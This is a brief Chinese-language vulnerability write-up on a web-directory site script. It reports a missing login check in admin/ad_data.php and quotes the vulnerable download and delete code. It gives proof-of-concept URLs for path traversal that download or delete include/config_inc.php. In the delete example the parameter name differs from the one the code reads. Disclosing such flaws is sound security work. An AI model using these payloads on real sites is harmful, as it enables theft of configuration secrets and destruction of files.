垃圾网址导航程序,内核盗用别人的程序还拿去卖钱。鸡肋漏洞,看分析。。

    在文件“admin\ad_data.php”中,备份还原数据库功能,没有进行管理登录验证。经典对白,看代码。

存在问题的代码:

case 'down':
    $filename or message('文件名不能为空');
    file_down('../data/'.$filename);
    break;

case 'delete':
    unlink("../data/{$_GET['filenames']}");
    message("文件<strong>{$_GET['filenames']}</strong>删除成功");
    break;

任意文件下载漏洞演示:
    http://127.0.0.1/admin/ad_data.php?action=down&filename=../include/config_inc.php

任意文件删除漏洞演示:
    http://127.0.0.1/admin/ad_data.php?action=delete&filename=../include/config_inc.php